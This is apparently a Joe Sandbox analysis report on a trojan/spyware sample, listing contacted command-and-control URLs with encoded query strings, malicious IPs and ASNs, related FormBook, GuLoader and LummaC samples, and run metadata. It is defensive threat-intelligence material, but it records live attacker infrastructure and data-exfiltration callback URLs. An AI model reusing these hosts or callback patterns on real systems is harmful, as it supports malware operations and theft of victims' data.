                                                                                    http://www.dorabox.org/0bnh/true
                                                                                      unknown
                                                                                      http://www.lpskfz.top/msip/true
                                                                                        unknown
                                                                                        http://www.starseedtechs.net/0gjs/true
                                                                                          unknown
                                                                                          http://www.2925588.com/b5ow/true
                                                                                            unknown
                                                                                            http://www.digitaladpro.shop/ggfl/?9X=iOyLpSsIOe7f6PU9BDul8aQY6xklT3REN+MLB2il0BbqrI6gnMpikIpJ6fgqZdrZw5fVWykdA1u8KoaFdWGY1+UrqNNya3HsbH6inHiT0cPHyFCdnV+w+9PZyCgPyXdb0A==&1BSHu=OBVxGh8PUTflSv4pfalse
                                                                                              unknown
                                                                                              http://www.newhopetoday.app/a3g8/true
                                                                                                unknown
                                                                                                http://www.starseedtechs.net/0gjs/?9X=74tOIgHVPHNRmMSbQ1G0Uys/MIeqG11kjpC3ScHU6uMB9ofcxcyuUhnM5ZTTEMr+dzoew9aF0rRRY7d44cQMhCha9Z99IC62F/V5eh7ipP5pSwEDea0JBXw5a45Uq3V7Aw==&1BSHu=OBVxGh8PUTflSv4ptrue
                                                                                                  unknown
                                                                                                  http://www.7wkto5nk230724z.click/smpu/true
                                                                                                    unknown
                                                                                                    http://www.onlinesbi.xyz/l11k/?1BSHu=OBVxGh8PUTflSv4p&9X=M8Hb3D8JFBWgl8NDQRtnT6SAJ1BxGk45Wmeu29AZTlLv6vUhGfTPJ7wrhjezmM25n5lhbrbM8JcqKDfkJqWfnug4cp36rrKREfuKJ5vJpoiT87e8p+M6jTeOWcRB3/wBow==true
                                                                                                      unknown
                                                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                                                      https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.svg#WebsupportSans-ExtraBoldregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://duckduckgo.com/chrome_newtabregsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://duckduckgo.com/ac/?q=regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://www.instagram.com/hover_domainsregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.websupport.sk/cart/domain-checkerregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://www.websupport.sk/podporaregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://www.femaled.info/6lzj/?9X=xAog8lu6Eu7QtFn4XzpwK636jvz7h/RiPL6Mqdregsvr32.exe, 00000005.00000002.4498387058.0000000005516000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000003776000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://www.hover.com/email?source=parkedregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.hover.com/about?source=parkedregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://www.websupport.sk/kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://www.hover.com/domains/resultsregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.eot?#iefixregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchregsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.woffregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://cdn.websupport.sk/fonts/WebsupportSans-Normal.eotregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://www.hover.com/tools?source=parkedregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://help.hover.com/home?source=parkedregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://www.hover.com/domain_pricing?source=parkedregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://www.hover.com/privacy?source=parkedregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://www.websupport.sk/support/kb-categories/ftp/kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://twitter.com/hoverregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoregsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.woff2regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://admin.websupport.sk/regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://www.hover.com/transfer_in?source=parkedregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://www.hover.com/renew?source=parkedregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.eotregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://www.ecosia.org/newtab/regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://cdn.websupport.sk/fonts/WebsupportSans-Normal.woff2regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://aswbf102.qkjcx.cn/38.htmlregsvr32.exe, 00000005.00000002.4498387058.0000000005E82000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000040E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.treatyourownhip.onlinekSsZkfadpV.exe, 00000006.00000002.4499448420.00000000056B7000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://ac.ecosia.org/autocomplete?q=regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://cdn.websupport.sk/fonts/WebsupportSans-Normal.ttfregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://www.hover.com/tos?source=parkedregsvr32.exe, 00000005.00000002.4498387058.000000000665C000.00000004.10000000.00040000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://cdn.websupport.eu/regsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://cdn.websupport.sk/fonts/WebsupportSans-Normal.eot?#iefixregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://cdn.websupport.sk/fonts/WebsupportSans-ExtraBold.ttfregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://cdn.websupport.sk/fonts/WebsupportSans-Normal.woffregsvr32.exe, 00000005.00000002.4498387058.00000000067EE000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4500146398.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.0000000004A4E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=regsvr32.exe, 00000005.00000003.2535066506.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.hover.com/?source=parkedkSsZkfadpV.exe, 00000006.00000002.4497823266.00000000048BC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          217.160.0.132
                                                                                                                                                                          www.astrext.infoGermany
                                                                                                                                                                          8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                          104.21.3.193
                                                                                                                                                                          www.7wkto5nk230724z.clickUnited States
                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                          81.169.145.95
                                                                                                                                                                          treatyourownhip.onlineGermany
                                                                                                                                                                          6724STRATOSTRATOAGDEtrue
                                                                                                                                                                          162.0.211.143
                                                                                                                                                                          www.nexari.xyzCanada
                                                                                                                                                                          35893ACPCAtrue
                                                                                                                                                                          37.9.175.196
                                                                                                                                                                          www.rvmsensors.netSlovakia (SLOVAK Republic)
                                                                                                                                                                          51013WEBSUPPORT-SRO-SK-ASSKtrue
                                                                                                                                                                          206.238.184.168
                                                                                                                                                                          www.lpskfz.topUnited States
                                                                                                                                                                          174COGENT-174UStrue
                                                                                                                                                                          103.71.154.12
                                                                                                                                                                          www.2925588.comHong Kong
                                                                                                                                                                          132325LEMON-AS-APLEMONTELECOMMUNICATIONSLIMITEDHKtrue
                                                                                                                                                                          84.32.84.32
                                                                                                                                                                          stoff-tanz.onlineLithuania
                                                                                                                                                                          33922NTT-LT-ASLTtrue
                                                                                                                                                                          3.33.130.190
                                                                                                                                                                          refs4refs.infoUnited States
                                                                                                                                                                          8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                          142.250.184.211
                                                                                                                                                                          ghs.google.comUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          142.250.186.115
                                                                                                                                                                          ghs.googlehosted.comUnited States
                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                          216.40.34.41
                                                                                                                                                                          www.newhopetoday.appCanada
                                                                                                                                                                          15348TUCOWSCAtrue
                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                          Analysis ID:1540314
                                                                                                                                                                          Start date and time:2024-10-23 17:11:13 +02:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 10m 15s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:7
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:2
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:LlbpXphTu9.exe
                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                          Original Sample Name:1bce82ea786776f80c8ccb92ad160ede.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/2@15/12
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 75%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 90%
                                                                                                                                                                          • Number of executed functions: 37
                                                                                                                                                                          • Number of non-executed functions: 316
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                          • VT rate limit hit for: LlbpXphTu9.exe
                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          11:13:09API Interceptor9916540x Sleep call for process: regsvr32.exe modified
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          217.160.0.13208.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.marketplaceimmo.com/q36s/?1bGpqN=3pP/L2XpSC30J9vFVSLRbULXiIxRhzb0AzWKRXEle5xB/rg0XzMhonS5eIq4WPaEzNk7&Vr=MBZl9ZMXj4u
                                                                                                                                                                          81.169.145.95WvwNJkZ8jcQuUnb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.hasenkamp.dev/cn26/?tFQt-Vx=V/Q+AkmkARTPGxAlDCgtsOI3MUO8Oc3kQ/EbPJKjUA6/hLSnxMTIt5W+tdpy91ahhBrO&CTp0R=cvKXnTUHWxJHefS
                                                                                                                                                                          order_2393.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • www.ofenrohr-thermometer.de/u5y432/h54f3.exe
                                                                                                                                                                          Dbo6LDXglX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.atocuisine.com/tnq3/?Ipph8=ipJpBwjJYnn7fmRH+s3SH2iXu4oUEaEXuph1JdP5Vp5a5Oaw1QxGNVakHWSWV2rO8M7il8e3AS+056pe7zwqIROfcMlLKZQwln2pfB5Il8GK&g6=f2JHt6nHvrxl-4
                                                                                                                                                                          PO#006503.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.thelousciouscocoon.com/nid3/?LDHT9bPx=kcSA6cNVSfzORzjXn3oPlElLOQqh4SHXbbwBcaqpFhTa+fuxel8slOskZBJjqKYIfld0&fFN=1bitK4v0
                                                                                                                                                                          37.9.175.196FedEx_773609516146.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.terazinvestment.com/g3h4/
                                                                                                                                                                          DHL Shipping DOC_69793741770.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.terazinvestment.com/nk2s/
                                                                                                                                                                          DHL shipping DOC_6979374150.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.terazinvestment.com/nk2s/
                                                                                                                                                                          DHL Receipt_2048094227.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.terazinvestment.com/nk2s/
                                                                                                                                                                          FedEx_AWB#53053752046.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.terazinvestment.com/nk2s/
                                                                                                                                                                          DHL_AWB#6209011980.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.terazinvestment.com/nk2s/
                                                                                                                                                                          DHL_AWB#6209811980.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.terazinvestment.com/nk2s/
                                                                                                                                                                          FedEx_24021747701.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.terazinvestment.com/nk2s/
                                                                                                                                                                          FedEx_2402657477.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.terazinvestment.com/nk2s/
                                                                                                                                                                          PO-H23-0006384.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.terazinvestment.com/nk2s/
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          www.astrext.infoOct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 217.160.0.132
                                                                                                                                                                          www.newhopetoday.appzamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 216.40.34.41
                                                                                                                                                                          10145202485.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 216.40.34.41
                                                                                                                                                                          www.2925588.comPO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                          • 103.71.154.12
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          ONEANDONE-ASBrauerstrasse48DEderstand.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 62.151.179.85
                                                                                                                                                                          feelnicewithgreatthingsgreatdayscomingforgreat.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                          • 62.151.179.85
                                                                                                                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 212.227.7.107
                                                                                                                                                                          Sprawl.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          • 213.165.67.102
                                                                                                                                                                          Rundholterne89.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          • 213.165.67.118
                                                                                                                                                                          Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 217.160.0.158
                                                                                                                                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 212.227.7.42
                                                                                                                                                                          Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 217.160.0.93
                                                                                                                                                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 212.227.138.124
                                                                                                                                                                          yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 74.208.123.157
                                                                                                                                                                          STRATOSTRATOAGDEbyte.arm.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                          • 85.215.62.133
                                                                                                                                                                          6fLnWSoXXD.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 81.169.217.50
                                                                                                                                                                          SecuriteInfo.com.Win64.TrojanX-gen.21901.11051.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 81.169.182.189
                                                                                                                                                                          arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 81.169.217.71
                                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 81.169.217.60
                                                                                                                                                                          HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 85.214.228.140
                                                                                                                                                                          na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                          • 81.169.242.82
                                                                                                                                                                          PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                          • 85.214.228.140
                                                                                                                                                                          08102024_1541_Beschwerde-Rechtsanwalt.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                          • 81.169.145.148
                                                                                                                                                                          Beschwerde-Rechtsanwalt.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                          • 81.169.145.148
                                                                                                                                                                          CLOUDFLARENETUS044SqLy1H3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                          sample.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                                                                                          • 104.21.65.137
                                                                                                                                                                          https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.16.117.116
                                                                                                                                                                          wRcmIT6Eji.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                          qfq0JTpoq9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                          http://docusign.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.18.66.57
                                                                                                                                                                          W1WowSI1iG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                          o9rbdhliSW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                          mh3FCXkJXk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                          wXtaX552wr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                          ACPCAnCEnoU35Wv.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                          • 162.0.215.71
                                                                                                                                                                          la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 162.0.101.75
                                                                                                                                                                          PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                          • 162.0.215.244
                                                                                                                                                                          ceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 162.22.97.189
                                                                                                                                                                          Payment-Inv.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                          • 162.55.60.2
                                                                                                                                                                          bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 162.32.169.42
                                                                                                                                                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 162.66.100.20
                                                                                                                                                                          arm4.elfGet hashmaliciousUnknownBrowse
